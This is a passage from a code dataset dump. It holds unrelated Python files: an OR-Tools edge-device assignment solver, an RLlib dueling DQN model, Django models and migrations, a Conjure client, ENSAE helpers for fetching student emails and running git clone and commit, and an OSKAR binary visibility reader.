range(num_tasks):\n objective_terms.append(costs[i][j] * x[i, j])\n\n solver.Minimize(solver.Sum(objective_terms))\n\n # Solve\n status = solver.Solve()\n print('Minimum cost = ', solver.Objective().Value())\n\n #print()\n final_Workers_IP=[0]*len(costs[1])\n #print()\n\n # Print solution.\n if status == pywraplp.Solver.OPTIMAL or status == pywraplp.Solver.FEASIBLE:\n #print('Total cost = ', solver.Objective().Value(), '\\n')\n for i in range(num_workers):\n for j in range(num_tasks):\n # Test if x[i,j] is 1 (with tolerance for floating point arithmetic).\n if x[i, j].solution_value() > 0.5:\n final_Workers_IP[j]='\\''+edge_devices [i]+'\\' '\n e_devices+='\\''+edge_devices [i]+'\\' '\n print('Edge node %d assigned to task %d. Cost = %d' % (i, j, costs[i][j]))\n print()\n end = time.time()\n print(\"Time = \", round(end - start, 4), \"seconds\")\n #print (new_edge_devices)\n e_devices = e_devices[:-1]\n e_devices+=')'\n finalIPsBashFormat='('\n for i in range(num_tasks):\n finalIPsBashFormat+=final_Workers_IP[i]\n finalIPsBashFormat= finalIPsBashFormat[:-1]\n finalIPsBashFormat+=')'\n print ()\n print(finalIPsBashFormat)\nif __name__ == '__main__':\n main()\n","sub_path":"DeFog/dm/mipj1.py","file_name":"mipj1.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"86543632","text":"import ray\n\nfrom ray.rllib.models.model import Model\n# from ray.rllib.models.misc import get_activation_fn, flatten\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils import try_import_tf\nfrom ray.rllib.models.misc import normc_initializer, get_activation_fn\n\ntf = try_import_tf()\n\n\nclass DuelingDQN(Model):\n \"\"\"Example of a custom model.\n This model just delegates to the built-in fcnet.\n \"\"\"\n\n def _build_layers_v2(self, input_dict, num_outputs, options):\n inputs = input_dict[\"obs\"]\n # filters = options.get(\"conv_filters\")\n filters = _get_filter_config(inputs.shape.as_list()[1:])\n\n with tf.name_scope(\"Conv_net\"):\n for i, (out_size, kernel, stride) in enumerate(filters[:-1], 1):\n inputs = tf.layers.conv2d(\n inputs,\n out_size,\n kernel,\n stride,\n activation=tf.nn.relu,\n padding=\"VALID\",\n name=\"conv{}\".format(i))\n out_size, kernel, stride = filters[-1]\n\n conv3 = tf.layers.conv2d(\n inputs,\n out_size,\n kernel,\n stride,\n activation=tf.nn.relu,\n padding=\"valid\",\n name=\"conv3\")\n\n conv3_flat = tf.layers.flatten(conv3)\n\n with tf.name_scope(\"fc_net\"):\n # label = \"fcn{}\".format(i)\n fcn4 = tf.layers.dense(\n conv3_flat,\n 512,\n kernel_initializer=normc_initializer(1.0),\n activation=tf.nn.relu,\n name=\"fcn4v\")\n fcnv = tf.layers.dense(\n fcn4,\n units=1,\n kernel_initializer=normc_initializer(1.0),\n activation=None,\n name=\"fcnv\")\n fcna = tf.layers.dense(\n fcn4,\n units=num_outputs,\n kernel_initializer=normc_initializer(1.0),\n activation=None,\n name=\"fcna\")\n # with tf.name_scope(\"fc_net\"):\n # # label = \"fcn{}\".format(i)\n # fcnv4 = tf.layers.dense(\n # conv3_flat,\n # 512,\n # kernel_initializer=normc_initializer(1.0),\n # activation=tf.nn.relu,\n # name=\"fcn4v\")\n # fcnv = tf.layers.dense(\n # fcnv4,\n # units=1,\n # kernel_initializer=normc_initializer(1.0),\n # activation=None,\n # name=\"fcnv\")\n # fcna4 = tf.layers.dense(\n # conv3_flat,\n # 512,\n # kernel_initializer=normc_initializer(1.0),\n # activation=tf.nn.relu,\n # name=\"fcn4v\")\n # fcna = tf.layers.dense(\n # fcna4,\n # units=num_outputs,\n # kernel_initializer=normc_initializer(1.0),\n # activation=None,\n # name=\"fcna\")\n q_values = fcnv + tf.subtract(fcna, tf.reduce_mean(fcna, axis=1, keepdims=True))\n # output = tf.argmax(q_values, 1)\n\n return q_values\n\n\ndef _get_filter_config(shape):\n shape = list(shape)\n\n filters = [\n [32, [8, 8], 4],\n [64, [4, 4], 2],\n [64, [3, 3], 1],\n ]\n if len(shape) == 3:\n return filters\n else:\n raise ValueError(\n \"input shape do not match conv_filters!\"\n )\n","sub_path":"algos/maxsqn_nstep_football/DQN_model.py","file_name":"DQN_model.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"23059504","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('ewords', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Self_ditictionary',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name_plural': 'Приватні словники',\n 'verbose_name': 'Приватний словник',\n 'get_latest_by': 'user',\n },\n ),\n migrations.AlterModelOptions(\n name='word',\n options={'verbose_name_plural': 'Слова', 'get_latest_by': 'word_name', 'verbose_name': 'Слово'},\n ),\n migrations.AlterField(\n model_name='word',\n name='word_name',\n field=models.CharField(verbose_name='Слово', serialize=False, primary_key=True, max_length=50, validators=[django.core.validators.RegexValidator('^[a-z+|Ĉ+|ĉ+|Ĝ+|ĝ+|Ŭ+|ŭ+|Ĥ+|ĥ+|Ŝ+|ŝ+]+$', 'Слово повинно бути тільки з esperanto букв')]),\n ),\n migrations.AddField(\n model_name='self_ditictionary',\n name='words',\n field=models.ManyToManyField(to='ewords.Word'),\n ),\n ]\n","sub_path":"ewords/migrations/0002_auto_20150709_1250.py","file_name":"0002_auto_20150709_1250.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"357619029","text":"import builtins\nfrom conjure_python_client import ConjureBeanType, ConjureDecoder, ConjureEncoder, ConjureFieldDefinition, Service\nfrom typing import Any, Dict, List\n\nclass SimpleNestedService(Service):\n\n def test_endpoint(self, string):\n # type: (str) -> str\n\n _headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n } # type: Dict[str, Any]\n\n _params = {\n } # type: Dict[str, Any]\n\n _path_params = {\n } # type: Dict[str, Any]\n\n _json = ConjureEncoder().default(string) # type: Any\n\n _path = '/catalog/testEndpoint'\n _path = _path.format(**_path_params)\n\n _response = self._request( # type: ignore\n 'POST',\n self._uri + _path,\n params=_params,\n headers=_headers,\n json=_json)\n\n _decoder = ConjureDecoder()\n return _decoder.decode(_response.json(), str)\n\nclass SimpleObject(ConjureBeanType):\n\n @builtins.classmethod\n def _fields(cls):\n # type: () -> Dict[str, ConjureFieldDefinition]\n return {\n 'string': ConjureFieldDefinition('string', str)\n }\n\n __slots__ = ['_string'] # type: List[str]\n\n def __init__(self, string):\n # type: (str) -> None\n self._string = string\n\n @builtins.property\n def string(self):\n # type: () -> str\n return self._string\n\n","sub_path":"conjure-python-core/src/test/resources/types/expected/package_name/nested_service/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"502268347","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom cardss.models import Cards\nfrom userss.models import UserProfile\nfrom django.utils import timezone\n\n# Create your models her\n\n\nclass CardLikes(models.Model):\n user = models.ForeignKey(\n UserProfile,\n default=\"\",\n null=True,\n related_name='user_likes',\n blank=True)\n\n like_on_card = models.ForeignKey(\n Cards,\n default=\"\",\n null=True,\n blank=True,\n related_name='card_likes')\n\n like = models.IntegerField(default=0)\n\n like_time = models.DateTimeField(default=timezone.now)\n\n def __str__(self):\n return self.user.name\n\n class Meta:\n verbose_name = 'Like'\n","sub_path":"likess/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"594277809","text":"\"\"\"\n@file\n@brief Some automation helpers to grab mails from student about project.\n\"\"\"\nimport re, os\nimport pymmails\nfrom pyquickhelper import noLOG, run_cmd\n\n_email_regex = re.compile(\"[*] *e?mails? *: *([^*+]+)\")\n_gitlab_regex = re.compile(\"[*] *gitlab *: *([^*+]+[.]git)\")\n_video_regex = re.compile(\"[*] *videos? *: *([^*\\\\n]+)\")\n\ndef grab_mails(mailbox, emails, subfolder, date, no_domain=False, fLOG = noLOG):\n \"\"\"\n look for some emails in a mail box\n from specific emails or sent to specific emails\n\n @param mailbox MailBoxImap object (we assume you are logged in)\n @param emails list of emails\n @param date date (grab emails since ..., example ``1-Oct-2014``)\n @param subfolder folder of the mailbox to look into\n @param no_domain remove domain when searching for emails\n @param fLOG logging function\n @return list of emails\n \"\"\"\n res = [ ]\n for m in emails:\n ms = m.split('@')[0] if no_domain else m\n iter = mailbox.enumerate_search_person(ms, subfolder, date=date)\n mails = list(iter)\n fLOG(\"looking for mail:\", m, \":\", len(mails), \" mails\")\n res.extend(mails)\n return res\n\ndef get_regex(path, regex, suivi = \"suivi.rst\"):\n \"\"\"\n retrieve data from file ``suivi.rst`` using a regular expression\n\n @param path sub folder to look into\n @param suivi name of the file ``suivi.rst``\n @return list of mails\n \"\"\"\n if not os.path.exists(path):\n raise FileNotFoundError(path)\n filename = os.path.join( path, suivi)\n if not os.path.exists(filename):\n raise FileNotFoundError(filename)\n\n with open(filename, \"r\", encoding=\"utf8\") as f :\n content = f.read()\n\n mails = regex.findall(content)\n if len(mails) == 0:\n raise Exception(\"unable to find the regular expression {0} in {1}\".format(regex.pattern, filename))\n\n allmails = [ ]\n for m in mails:\n allmails.extend ( m.strip(\"\\n\\r\\t \").split(\";\") )\n\n return allmails\n\ndef get_emails(path, suivi = \"suivi.rst\"):\n \"\"\"\n retrieve student emails from file ``suivi.rst``\n\n @param path sub folder to look into\n @param suivi name of the file ``suivi.rst``\n @return list of mails\n \"\"\"\n global _email_regex\n allmails = get_regex(path, _email_regex, suivi)\n for a in allmails :\n ff = a.split(\"@\")\n if len(ff) != 2:\n raise Exception(\"unable to understand mail {0} in {1} (mail separator is ;)\".format(a, filename))\n return allmails\n \n\ndef get_videos(path, suivi = \"suivi.rst\"):\n \"\"\"\n retrieve student emails from file ``suivi.rst``\n\n @param path sub folder to look into\n @param suivi name of the file ``suivi.rst``\n @return list of mails\n \"\"\"\n global _video_regex\n return get_regex(path, _video_regex, suivi)\n\ndef dump_mails_project(path,\n mailbox,\n subfolder,\n date,\n suivi = \"suivi.rst\",\n dest = \"emails\",\n no_domain = False,\n fLOG = noLOG):\n \"\"\"\n This function extract emails from a mailbox\n received from or sent to people\n\n The function expects to find a file ``suivi.rst`` which contains some emails addresses,\n it will look for mails and will dump them into the folder\n in HTML format.\n\n @param path folder\n @param mailbox MailBoxImap object (we assume you are logged in)\n @param suivi filename for ``suivi.rst``\n @param dest destinaion folder for the emails (relative to path)\n @param date date (grab emails since ..., example ``1-Oct-2014``)\n @param subfolder folder of the mailbox to look into\n @param no_domain remove domain when searching for emails\n @param fLOG logging function\n @return list of created files\n\n @example(Automation___Grab all emails from students)\n\n The following program assumes each folder contains the files\n of a student project.\n\n It assumes each folder contains a file ``suivi.rst``\n and emails from students can be extracted with\n by searching the following regular expression:\n ``mails: ....``.\n Then it stores everything into the folder in\n subfolder called ``mails``.\n\n @code\n from ensae_teaching_cs.automation.project_helper import dump_mails_project\n imap = pymmails.MailBoxImap(\"gmail.account\", \"password\", \"imap.gmail.com\", True)\n imap.login()\n\n sub = os.listdir(\".\")\n for fold in sub:\n print(\"***\",fold)\n dump_mails_project(\n os.path.abspath(fold),\n imap,\n subfolder = \"ensae\",\n date = \"1-Oct-2014\",\n no_domain=True,\n fLOG=print)\n @endcode\n\n The function expects ``suivi.rst`` must be encoded in ``utf8``.\n\n @endexample\n \"\"\"\n allmails = get_emails(path, suivi)\n\n fLOG(\"emails\",allmails)\n listmails = grab_mails(emails = allmails, mailbox=mailbox,\n subfolder=subfolder, date=date, fLOG=fLOG,\n no_domain=no_domain)\n\n absdest = os.path.join( path, dest)\n fs = mailbox.dump_html(listmails, absdest)\n\n memo = [ ]\n for mail,filename in fs:\n memo.append ( (mail.get_date(), filename, mail) )\n memo.sort()\n\n index = os.path.join(path, \"index_mail.html\")\n with open(index, \"w\", encoding=\"utf8\") as ff:\n ff.write(\"

    {0}

    \\n\".format(os.path.split(path)[-1]))\n ff.write(\"
      \\n\")\n for date, filename, mail in memo:\n fr = mail.get_from()[1]\n dt = date\n su = mail.get_field(\"subject\")\n li = '
    • {1} - from {2} - {3}
    • \\n'.format(filename, dt, fr, su)\n ff.write(li)\n ff.write(\"
    \\n\")\n ff.write(\"\\n\")\n\n return [ _[1] for _ in memo ] + [ index ]\n\ndef git_url_user_password(url_https, user, password):\n \"\"\"\n builds a url (starting with https) and add the user and the password\n to skip the authentification\n\n @param url_https example ``https://gitlab.server/folder/project_name``\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @return url\n \"\"\"\n url_user = url_https.replace(\"https://\", \"https://{0}:{1}@\".format(user, password))\n return url_user\n\ndef git_check_error(out, err, fLOG):\n \"\"\"\n private function, analyse the output\n \"\"\"\n if len(out) > 0 :\n fLOG(\"OUT:\\n\" + out)\n if len(err) > 0 :\n if \"error\" in err.lower():\n raise Exception(\"OUT:\\n{0}\\nERR:\\n{1}\".format(out,err))\n fLOG(\"ERR:\\n\" + err)\n\ndef git_clone(\n local_folder,\n url_https,\n user = None,\n password = None,\n timeout = 60,\n init = True,\n fLOG = noLOG):\n \"\"\"\n clone a project from a git repository in a non empty local folder,\n it requires `GIT `_ to be installed\n and uses the command line.\n\n @param local_folder local folder of the project\n @param url_https url, example ``https://gitlab.server/folder/project_name``\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param init see below (True, use fetch, False, use clone)\n @param fLOG logging function\n @return local_folder\n\n If the reposity has already been cloned, it does not do it again.\n We assume that git can be run without giving its full location.\n\n The function executes the following commands (if init is True)::\n\n cd [folder]\n git init\n git remote add origin [https://user.password@server/project.git]\n git fetch\n\n Otherwise, it does::\n\n cd [folder]\n git clone origin [https://user.password@server/project.git]\n git fetch\n\n A folder will be created.\n\n @example(Automation___Clone many folders in one row)\n\n @code\n eleves = \"project1;project2;...\"\n root = r\"destination\"\n\n for el in eleves.split(\";\"):\n cl = el.lower().replace(\".\",\"-\")\n fold = os.path.join(root, cl)\n if not os.path.exists(fold):\n print(\"clone\", el)\n url = \"https://versioning.ensae.fr/python-2a/{0}.git\".format(cl)\n git_clone( root, url,user=user,password=password, init=False,fLOG=print)\n @endcode\n\n @endexample\n\n \"\"\"\n url_user = git_url_user_password(url_https, user, password)\n timeout = 60\n local_folder = os.path.normpath(os.path.abspath(local_folder))\n\n if init:\n if not os.path.exists(local_folder):\n fLOG(\"creating folder\", local_folder)\n os.mkdir(local_folder)\n\n hg = os.path.join(local_folder, \".git\")\n if not os.path.exists(hg):\n cmds= \"\"\"\n cd {0}\n git init\n git remote add origin {1}\n git fetch\n \"\"\".format(local_folder, url_user).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\n return local_folder\n else:\n if not os.path.exists(local_folder):\n raise FileNotFoundError(local_folder)\n hg = os.path.join(local_folder, \".git\")\n if os.path.exists(hg):\n raise Exception(\"folder {0} should not exists (init is True)\".format(local_folder))\n\n final = os.path.split(url_user)[-1].replace(\".git\",\"\")\n locf = os.path.join(local_folder, final)\n if os.path.exists(locf):\n raise Exception(\"folder {0} should not exists before cloning\".format(locf))\n\n cmds= \"\"\"\n cd {0}\n git clone {1}\n \"\"\".format(local_folder, url_user).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\n return locf\n\ndef git_change_remote_origin(\n local_folder,\n url_https,\n user = None,\n password = None,\n add_fecth = True,\n timeout = 10,\n fLOG = noLOG\n ):\n \"\"\"\n Change the origin of the repository. The url and the password\n refer to the new repository.\n\n @param local_folder local folder\n @param url_https url, example ``https://gitlab.server/folder/project_name``\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param add_fetch add instruction ``fetch``\n @param fLOG logging function\n @return something\n\n The function runs the instruction::\n\n git remote remove origin\n git remote add origin url\n\n \"\"\"\n url_user = git_url_user_password(url_https, user, password)\n cmds= \"\"\"\n cd {0}\n git remote remove origin\n git remote add origin {0}\n \"\"\".format(local_folder, url_user).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n if add_fetch:\n cmds += \"\\ngit fetch\"\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\ndef git_commit_all(\n local_folder,\n url_https,\n message,\n user = None,\n password = None,\n timeout = 300,\n fLOG = noLOG):\n \"\"\"\n from a git repository,\n it requires `GIT `_ to be installed\n and uses the command line.\n\n @param local_folder local folder of the project\n @param url_https url, example ``https://gitlab.server/folder/project_name``\n @param message message for the commit\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param fLOG logging function\n @return None\n\n If the reposity has already been cloned, it does not do it again.\n We assume that git can be run without giving its full location.\n\n The function executes the following commands::\n\n cd [folder]\n git add -A\n git commit -m \"[message]\"\n git push -u origin master\n\n \"\"\"\n #url_user = git_url_user_password(url_https, user, password)\n cmds= \"\"\"\n cd {0}\n git add -A\n git commit -m \"{1}\"\n git push -u origin master\n \"\"\".format(local_folder, message).replace(\" \",\"\").strip(\" \\n\\r\\t\")\n cmd = cmds.replace(\"\\n\",\"&\")\n sin = \"\" #\"{0}\\n\".format(password)\n out, err = run_cmd(cmd, sin=sin,wait=True, timeout=timeout, fLOG=fLOG)\n git_check_error(out, err, fLOG)\n\ndef git_first_commit_all_projects(\n local_folder,\n user = None,\n password = None,\n timeout = 300,\n suivi = \"suivi.rst\",\n fLOG = noLOG):\n \"\"\"\n @param local_folder folder\n @param user part 1 of the credentials\n @param password part 2 of the credentials\n @param timeout timeout for the command line\n @param suivi file to open to get the gitlab account\n @param fLOG logging function\n @return None or ( local_folder, gitlab )\n \"\"\"\n if not os.path.exists(local_folder):\n raise FileNotFoundError(local_folder)\n filename = os.path.join( local_folder, suivi)\n if not os.path.exists(filename):\n raise FileNotFoundError(filename)\n\n with open(filename, \"r\", encoding=\"utf8\") as f :\n content = f.read()\n\n global _gitlab_regex\n gitlab = _gitlab_regex.findall(content)\n if len(gitlab) == 0:\n raise Exception(\"unable to find the regular expression {0} in {1}\".format(_gitlab_regex.pattern, filename))\n if not isinstance (gitlab, list):\n raise TypeError(\"we expect a list for: \" + str(gitlab))\n if len(gitlab) != 1:\n raise Exception(\"more than one gitlab repo is mentioned {0} in {1}\".format(_gitlab_regex.pattern, filename))\n gitlab = gitlab[0]\n\n fLOG(\"* gitlab\", gitlab)\n g = os.path.join(local_folder, \".git\")\n commit = None\n if not os.path.exists(g):\n fLOG(\"* initialize\", local_folder)\n git_clone(local_folder, gitlab,\n user=user, password=password, fLOG=fLOG)\n sub = os.path.split(local_folder)[-1]\n fLOG(\"* first commit \", gitlab)\n git_commit_all(local_folder, gitlab,\n \"first commit to \" + sub,\n user=user, password=password, fLOG=print)\n commit= local_folder, gitlab\n\n return commit","sub_path":"src/ensae_teaching_cs/automation/project_helper.py","file_name":"project_helper.py","file_ext":"py","file_size_in_byte":15741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"374342999","text":"# -*- coding: utf-8 -*-\n\"\"\"Read OSKAR binary files from python.\"\"\"\n\nimport collections\nimport os\nimport struct\n\nimport astropy.units as u\nimport numpy\nfrom astropy.coordinates import ICRS, EarthLocation, SkyCoord\n\nfrom rascil.data_models.memory_data_models import Visibility, Configuration\n\n\nclass OskarBinary(object):\n\n \"\"\"Class providing an interface to OSKAR binary data files.\n\n see:\n http://www.oerc.ox.ac.uk/~ska/oskar2/OSKAR-Binary-File-Format.pdf\n\n TODO:\n - Split data reading from indexing to be able to deal with very large\n files and make reading a sub-set of the data faster.\n \"\"\"\n\n # noinspection PyRedeclaration\n class DataType:\n # noinspection PyRedeclaration\n Char, Int, Single, Double, _, Complex, Matrix, _ = range(8)\n\n # noinspection PyRedeclaration,PyRedeclaration,PyRedeclaration,PyRedeclaration\n class Group:\n # noinspection PyRedeclaration,PyRedeclaration,PyRedeclaration,PyRedeclaration\n _, Standard, _, Settings, RunInfo, _, _,\\\n Sky, _, Spline, Element, VisHeader, VisBlock = range(13)\n\n class Standard:\n _, DateTime, Version, UserName, WorkingDir = range(5)\n\n class Settings(object):\n Path = 1\n File = 2\n\n class RunInfo(object):\n Log = 1\n\n def __init__(self, file_name):\n \"\"\"Constructor.\"\"\"\n if not os.path.exists(file_name):\n raise ValueError('Specified visibility file %s not found!' % file_name)\n self.file_name = file_name\n self.file_handle = open(file_name, 'rb')\n self.bin_ver = 0\n self.record = collections.OrderedDict()\n self.read()\n\n def __del__(self):\n \"\"\"Destructor.\"\"\"\n self.file_handle.close()\n\n def read_header(self):\n \"\"\"Read header.\"\"\"\n f = self.file_handle\n name = f.read(9)\n if name[0:8] != b'OSKARBIN':\n raise ValueError('Not a valid OSKAR binary file.')\n bin_ver = struct.unpack('B', f.read(1))[0]\n if not (bin_ver == 1 or bin_ver == 2):\n raise ValueError('The class can only read OSKAR binary '\n 'format version 1 or 2.')\n self.bin_ver = bin_ver\n\n # Version 1: header information.\n if bin_ver == 1:\n endian = struct.unpack('B', f.read(1))[0]\n svoid = struct.unpack('B', f.read(1))[0]\n sint = struct.unpack('B', f.read(1))[0]\n slong = struct.unpack('B', f.read(1))[0]\n sfloat = struct.unpack('B', f.read(1))[0]\n sdouble = struct.unpack('B', f.read(1))[0]\n patch = struct.unpack('B', f.read(1))[0]\n minor = struct.unpack('B', f.read(1))[0]\n major = struct.unpack('B', f.read(1))[0]\n other = struct.unpack('B', f.read(1))[0]\n # Version 2: read remaining reserved space.\n else:\n _ = f.read(64 - 10)\n\n @staticmethod\n def is_set(x, n):\n \"\"\"Checks if a flag is set (value of bit n in byte x).\"\"\"\n return x & 2**n != 0\n\n def read_block_header(self, block_index):\n \"\"\".\"\"\"\n f = self.file_handle\n\n element_size = struct.unpack('B', f.read(1))[0]\n chunk_flags = struct.unpack('B', f.read(1))[0]\n data_type = struct.unpack('B', f.read(1))[0]\n group = struct.unpack('B', f.read(1))[0]\n tag = struct.unpack('B', f.read(1))[0]\n index = struct.unpack('i', f.read(4))[0]\n block_size = struct.unpack('l', f.read(8))[0]\n\n if group not in self.record:\n self.record[group] = collections.OrderedDict()\n if tag not in self.record[group]:\n self.record[group][tag] = collections.OrderedDict()\n if index not in self.record[group][tag]:\n self.record[group][tag][index] = collections.OrderedDict()\n\n block = self.record[group][tag][index]\n block['group'] = group\n block['tag'] = tag\n block['index'] = index\n block['number'] = block_index\n block['element_size'] = element_size\n block['chunk_flags'] = chunk_flags\n block['flag_endian'] = self.is_set(chunk_flags, 5)\n block['flag_crc'] = self.is_set(chunk_flags, 6)\n block['flag_extended'] = self.is_set(chunk_flags, 7)\n block['data_type'] = data_type\n block['block_size'] = block_size\n\n return block\n\n def read_block_data(self, block):\n \"\"\".\"\"\"\n f = self.file_handle\n\n # Data size of the block payload.\n data_size = block['block_size']\n if block['flag_crc']:\n data_size -= 4\n\n # Read the block payload.\n if self.is_set(block['data_type'], self.DataType.Char):\n name = 'char'\n n = data_size\n data = f.read(data_size)\n\n elif self.is_set(block['data_type'], self.DataType.Int):\n name = 'int'\n n = data_size // block['element_size']\n data = struct.unpack('i' * n, f.read(data_size))\n\n elif self.is_set(block['data_type'], self.DataType.Single):\n if self.is_set(block['data_type'], self.DataType.Matrix):\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'single complex matrix'\n n = data_size // block['element_size'] * 2 * 4\n else:\n name = 'single matrix'\n n = data_size // block['element_size'] * 4\n else:\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'single complex'\n n = data_size // block['element_size'] * 2\n else:\n name = 'single'\n n = data_size // block['element_size']\n data = struct.unpack('f' * n, f.read(data_size))\n\n elif self.is_set(block['data_type'], self.DataType.Double):\n if self.is_set(block['data_type'], self.DataType.Matrix):\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'double complex matrix'\n n = data_size // block['element_size'] * 2 * 4\n else:\n name = 'double matrix'\n n = data_size // block['element_size'] * 4\n else:\n if self.is_set(block['data_type'], self.DataType.Complex):\n name = 'double complex'\n n = data_size // block['element_size'] * 2\n else:\n name = 'double'\n n = data_size // block['element_size']\n data = struct.unpack('d ' * n, f.read(data_size))\n\n else:\n raise ValueError('ERROR: Unknown binary data type detected.')\n\n # Add the data block into the block dictionary.\n block['data_type_name'] = name\n block['data_length'] = n\n block['data'] = numpy.squeeze(data)\n\n if (self.is_set(block['data_type'], self.DataType.Double) or\n self.is_set(block['data_type'], self.DataType.Single)) \\\n and block['data'].shape != ():\n assert len(block['data'].shape) == 1, \\\n 'Unexpected Matrix like block data shape detected ' \\\n '@ block number %i id:(%i.%i.%i)' % (block['number'],\n block['group'],\n block['tag'],\n block['index'])\n # Convert complex data to python complex type\n if self.is_set(block['data_type'], self.DataType.Complex):\n block['data'] = numpy.array([complex(v[0], v[1]) for v\n in block['data'].reshape(n // 2, 2)\n ])\n block['block_length'] = n / 2\n # Wrap matrix data into 2 x 2 blocks.\n if self.is_set(block['data_type'], self.DataType.Matrix):\n n = block['block_length']\n block['data'] = block['data'].reshape(n // 4, 2, 2)\n\n if block['flag_crc']:\n # TODO(BM) implement CRC check. e.g. http://goo.gl/IfyyOO\n f.read(4)\n\n def read_data(self):\n \"\"\".\"\"\"\n f = self.file_handle\n block_id = 0\n while f.read(3) == b'TBG':\n block = self.read_block_header(block_id)\n self.read_block_data(block)\n block_id += 1\n\n def read(self):\n \"\"\".\"\"\"\n self.read_header()\n self.read_data()\n\n def date_time(self):\n gid = self.Group.Standard\n tid = self.Standard.DateTime\n if gid in self.record and tid in self.record[gid]:\n assert len(self.record[gid][tid]) == 1, \\\n 'Expecting only one standard group, date-time tag!'\n return self.record[gid][tid][0]['data']\n\n def user(self):\n gid = self.Group.Standard\n tid = self.Standard.UserName\n if gid in self.record and tid in self.record[gid]:\n assert len(self.record[gid][tid]) == 1, \\\n 'Expecting only one standard group, user tag!'\n return self.record[gid][tid][0]['data']\n\n def settings(self):\n gid = self.Group.Settings\n tid = self.Settings.File\n if gid in self.record and tid in self.record[gid]:\n assert len(self.record[gid][tid]) == 1, \\\n 'Expecting only one standard group, settings tag!'\n return self.record[gid][tid][0]['data']\n\n def print_summary(self):\n for group_id in self.record:\n group_data = self.record[group_id]\n for tag_id in group_data:\n tag_data = group_data[tag_id]\n for index in tag_data:\n block = tag_data[index]\n print('[%03i]' % block['number'], end=' ')\n block_id = '%i.%i.%i' % (group_id, tag_id, index)\n print('%-9s' % block_id, end=' ')\n if block['flag_crc']:\n print('crc', end=' ')\n print('')\n\n\nclass OskarVis(OskarBinary):\n\n \"\"\".\"\"\"\n\n class VisHeader:\n TelescopePath = 1\n NumVisBlockTags = 2\n FlagAutoCorrelation = 3\n FlagCrossCorrelation = 4\n VisDataType = 5\n CoordDataType = 6\n MaxTimes = 7\n NumTimes = 8\n MaxChannels = 9\n NumChannels = 10\n NumStations = 11\n PolarisationType = 12\n PhaseCentreCoordType = 21\n PhaseCentre = 22\n StartFrequency = 23\n FrequencyIncrement = 24\n ChannelBandwidth = 25\n StartTime = 26\n TimeInterval = 27\n TimeIntegration = 28\n TelescopeLon = 29\n TelescopeLat = 30\n TelescopeAlt = 31\n StationX = 32\n StationY = 33\n StationZ = 34\n\n class VisBlock:\n Dims = 1\n AutoCorrelation = 2\n CrossCorrelation = 3\n UU = 4\n VV = 5\n WW = 6\n\n class PolarisationType:\n IQUV = 0,\n I = 1,\n Q = 2,\n U = 3,\n V = 4,\n Linear = 10,\n XX = 11,\n XY = 12,\n YX = 13,\n YY = 14\n\n def __init__(self, file_name):\n\n OskarBinary.__init__(self, file_name)\n # super(OskarVis, self).print_summary()\n if not self.bin_ver == 2:\n raise ValueError(\"Only OSKAR binary format version-2.0 files \"\n \"can be read by this class.\")\n\n # Make local copies of visibility header variables.\n vis_header = self.record[self.Group.VisHeader]\n assert len(vis_header) == 26, \\\n 'Expecting the visibility header to have 26 tags!'\n self.block_length = vis_header[self.VisHeader.MaxTimes][0]['data']\n self.num_times = vis_header[self.VisHeader.NumTimes][0]['data']\n self.num_channels = vis_header[self.VisHeader.NumChannels][0]['data']\n self.num_stations = vis_header[self.VisHeader.NumStations][0]['data']\n self.num_baselines = self.num_stations * (self.num_stations - 1) // 2\n self.num_blocks = int(numpy.ceil(float(self.num_times) /\n self.block_length))\n self.pol_type = vis_header[self.VisHeader.PolarisationType][0]['data']\n self._start_time = vis_header[self.VisHeader.StartTime][0]['data']\n self._time_interval = vis_header[self.VisHeader.TimeInterval][0]['data']\n self._phase_centre_type = vis_header[self.VisHeader.PhaseCentreCoordType][0]['data']\n self._phase_centre = 